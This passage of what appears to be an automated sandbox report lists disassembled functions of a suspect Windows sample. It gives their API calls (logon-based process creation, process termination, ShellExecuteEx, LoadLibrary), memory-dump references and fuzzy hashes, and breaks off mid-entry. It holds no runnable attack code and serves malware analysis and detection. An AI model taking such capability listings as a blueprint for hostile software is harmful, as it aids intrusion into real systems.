                                                                      • Instruction Fuzzy Hash: 4C119A31500725EFDB10DFA8EC49FAE7BA9FB95366F104128F48197211D735A941CFA0
                                                                      Function 00A214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A214FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A21506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A21515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00A21520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A2154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A21563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: d1c331e70677ceef0788a1489e138fcc5ac294f9ec3ebb026433ce5edae889ec
                                                                      • Instruction ID: 3531b80786a4f5d1717a5f948305c14e71a2d0889a8c8271a12646cd5753e06e
                                                                      • Opcode Fuzzy Hash: d1c331e70677ceef0788a1489e138fcc5ac294f9ec3ebb026433ce5edae889ec
                                                                      • Instruction Fuzzy Hash: 431144B250020DAFDB11CFA8ED49FDA7BA9FB48719F044064FA05A20A0C3768E61DB60
                                                                      Function 009E3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,009E3379,009E2FE5), ref: 009E3390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009E339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009E33B7
                                                                      • SetLastError.KERNEL32(00000000,?,009E3379,009E2FE5), ref: 009E3409
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 6f1da1f95ace16028cc1f43ea4a17c9bfd7ded40becb8ccb0e36aaeed2bee49d
                                                                      • Instruction ID: e18cb16184b849f6355636b67814ce9433ec07b6a89e02d5cb75fbd3da38d57e
                                                                      • Opcode Fuzzy Hash: 6f1da1f95ace16028cc1f43ea4a17c9bfd7ded40becb8ccb0e36aaeed2bee49d
                                                                      • Instruction Fuzzy Hash: 8E012832208751BFE72727B7FC8EA662AA8EB457B57308229F410871F0FF614D025A64
                                                                      Function 009F2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,009F5686,00A03CD6,?,00000000,?,009F5B6A,?,?,?,?,?,009EE6D1,?,00A88A48), ref: 009F2D78
                                                                      • _free.LIBCMT ref: 009F2DAB
                                                                      • _free.LIBCMT ref: 009F2DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,009EE6D1,?,00A88A48,00000010,009C4F4A,?,?,00000000,00A03CD6), ref: 009F2DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,009EE6D1,?,00A88A48,00000010,009C4F4A,?,?,00000000,00A03CD6), ref: 009F2DEC
                                                                      • _abort.LIBCMT ref: 009F2DF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 2bb2251c41243b3c98b98b87ff36475f9fa6cef451efcb545229371cc2fc2c87
                                                                      • Instruction ID: c6a11bbe99ad3460f61fe65f04af7a0a15a4199d76bce4fd91546fc9df160e61
                                                                      • Opcode Fuzzy Hash: 2bb2251c41243b3c98b98b87ff36475f9fa6cef451efcb545229371cc2fc2c87
                                                                      • Instruction Fuzzy Hash: 4AF0F431545B0C2BC2126774BC0AF7A265DBFC27B1F214518FB24971E6EE2888024320
                                                                      Function 00A58A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                        • Part of subcall function 009D9639: BeginPath.GDI32(?), ref: 009D96B9
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A58A4E
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00A58A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A58A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00A58A80
                                                                      • EndPath.GDI32(?), ref: 00A58A90
                                                                      • StrokePath.GDI32(?), ref: 00A58AA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: a6f12be63bec60b261dd4e114f91a6404ae471ada204548fefb5f83ae465ea80
                                                                      • Instruction ID: cb39401e3f09484ed1a44951059a37c45c33645ec3e23e16fb13209c8364facb
                                                                      • Opcode Fuzzy Hash: a6f12be63bec60b261dd4e114f91a6404ae471ada204548fefb5f83ae465ea80
                                                                      • Instruction Fuzzy Hash: 2811FA76000209FFDF119FD0DC88EAA7F6CFB043A1F048012BA15951A1C7719D56DB60
                                                                      Function 00A251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00A25218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A25229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A25230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A25238
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A2524F
                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A25261
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: ec8b84313eab89c88dd68d892dbaa0fcd036efc3ad195a598cfd04f4b906c712
                                                                      • Instruction ID: 46b919f025f80c9d3650ac21726d8f080fda1b3df3d9d13bdfd1f88a4f39589a
                                                                      • Opcode Fuzzy Hash: ec8b84313eab89c88dd68d892dbaa0fcd036efc3ad195a598cfd04f4b906c712
                                                                      • Instruction Fuzzy Hash: 18014F75E00718BFEB109BF99C49A9EBFB8FF48762F044065FA04A7285D6709901CBA0
                                                                      Function 009C1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009C1BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 009C1BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009C1C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009C1C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 009C1C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009C1C22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: c407002500a2bbd5898746fe3d60fa32d5f5ad510b18c5b2ce6054823c12cd18
                                                                      • Instruction ID: 51e9c427b8d3cb60cfc0559d9ad52e9a8ea3171e8bf38dc2ac342fbd4367f2aa
                                                                      • Opcode Fuzzy Hash: c407002500a2bbd5898746fe3d60fa32d5f5ad510b18c5b2ce6054823c12cd18
                                                                      • Instruction Fuzzy Hash: E80167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                      Function 00A2EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A2EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A2EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00A2EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB6E
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: e85543da0b3f463bc6ee0f386937fc9765154cbdb5e37769769e220c0f2e2315
                                                                      • Instruction ID: 0c7e86555d45c2b58d94884bdba392e16280a14173a0c667a3ea7e3f78bd8ddf
                                                                      • Opcode Fuzzy Hash: e85543da0b3f463bc6ee0f386937fc9765154cbdb5e37769769e220c0f2e2315
                                                                      • Instruction Fuzzy Hash: 0CF01D72240758BFE62197929C0DEAB7A7CFBCAB22F004158F601D109596A45A4286B5
                                                                      Function 00A17439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClientRect.USER32(?), ref: 00A17452
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A17469
                                                                      • GetWindowDC.USER32(?), ref: 00A17475
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00A17484
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A17496
                                                                      • GetSysColor.USER32(00000005), ref: 00A174B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                      • String ID:
                                                                      • API String ID: 272304278-0
                                                                      • Opcode ID: 88d438d942bfb536f5660e2efe6d53e33cc03982ac960911670bd27e6aa7e2fa
                                                                      • Instruction ID: 7115640b6d2f84ab27346bcfbf18caabb29bc0932462ea9e7235f5bdb2c8f066
                                                                      • Opcode Fuzzy Hash: 88d438d942bfb536f5660e2efe6d53e33cc03982ac960911670bd27e6aa7e2fa
                                                                      • Instruction Fuzzy Hash: 4A018631440305EFEB519FA4DC08BEE7BB5FB04322F201160F916A31A0CB311E82EB10
                                                                      Function 00A21874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A2187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00A2188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00A21894
                                                                      • CloseHandle.KERNEL32(?), ref: 00A2189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A218A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A218AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: d5b33c0a827b1587be1838579e54fcec40ef31991e066a678d16e93f36798c28
                                                                      • Instruction ID: 37e6e74aef339838fa05d0353f23f01b70714713bef854e9e944427e19cdb884
                                                                      • Opcode Fuzzy Hash: d5b33c0a827b1587be1838579e54fcec40ef31991e066a678d16e93f36798c28
                                                                      • Instruction Fuzzy Hash: D4E0C236004705BFDA019BE1ED0C90ABB69FB49B32B108220F22685478CB32A4A2DB50
                                                                      Function 00A2C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A2C6EE
                                                                      • _wcslen.LIBCMT ref: 00A2C735
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A2C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A2C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0
                                                                      • API String ID: 1227352736-4108050209
                                                                      • Opcode ID: 4ff9fdd7267485174c9f0151eab6aefcdaaf09357d91b35e717e4de2cba40d39
                                                                      • Instruction ID: 83cbebaf6d02694e6fbd24a26ef22d97a9696ca499745d2122e0dc0c476873a7
                                                                      • Opcode Fuzzy Hash: 4ff9fdd7267485174c9f0151eab6aefcdaaf09357d91b35e717e4de2cba40d39
                                                                      • Instruction Fuzzy Hash: 2551CC716043619BD7159F2CE885B6EB7E8AF89320F040A3DF995E32A1DB64DD04CB92
                                                                      Function 00A4AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00A4AEA3
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00A4AF38
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4AF67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 146682121-1426351568
                                                                      • Opcode ID: 17e76f7470b1ed47b03ef46f56119b9c06d11702b04fd10a36403351fd51dcb2
                                                                      • Instruction ID: 1bc0dcfaa4502aaf5a3b4070beec89cd7b0182bf65523250eb6a487282a21942
                                                                      • Opcode Fuzzy Hash: 17e76f7470b1ed47b03ef46f56119b9c06d11702b04fd10a36403351fd51dcb2
                                                                      • Instruction Fuzzy Hash: BE714675A00619DFCB14DF94C485A9EBBF0BF88314F04849DE81AAB362CB74ED45CB92
                                                                      Function 00A2719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A27206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A2723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A2724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A272CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: a791f42b6e3e5113fe61bd8c3da1662ce6975c09e132d79e434c7ff4c97713a1
                                                                      • Instruction ID: 25549621343fdb8f2cd52e5d6e0e893a8b617803f395b12e98d3728b2cb6d51d
                                                                      • Opcode Fuzzy Hash: a791f42b6e3e5113fe61bd8c3da1662ce6975c09e132d79e434c7ff4c97713a1
                                                                      • Instruction Fuzzy Hash: BE413971A04314EFDB15CF98D884A9E7BB9EF44710F1580A9FD059F20AD7B1DA45CBA0
                                                                      Function 00A21DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A21E66
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A21E79
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A21EA9
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2081771294-1403004172
                                                                      • Opcode ID: f587b4a7ffc041b05759c3c7aa922bb79fe7e090c4a79bccf956c382109df1a2
                                                                      • Instruction ID: 6fee2507ee273df6297466753b304b081362fb42763243c09be16c2111b9140e
                                                                      • Opcode Fuzzy Hash: f587b4a7ffc041b05759c3c7aa922bb79fe7e090c4a79bccf956c382109df1a2
                                                                      • Instruction Fuzzy Hash: 7D212C71D00104BFDB14ABA8EC59DFF77B8EF95360B104539F825A71D1DB384D0A8620
                                                                      Function 00A52F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A52F8D
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00A52F94
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A52FA9
                                                                      • DestroyWindow.USER32(?), ref: 00A52FB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 3529120543-1011021900
                                                                      • Opcode ID: 2ed5cf98b2bbdc8b0f79f20dfc1bab9fc7ddbf6bab257920c2a9356de6654066
                                                                      • Instruction ID: 603d5df475bf422b397e9d6652faa8aaa767987c139528117e268cffd5fdf77f
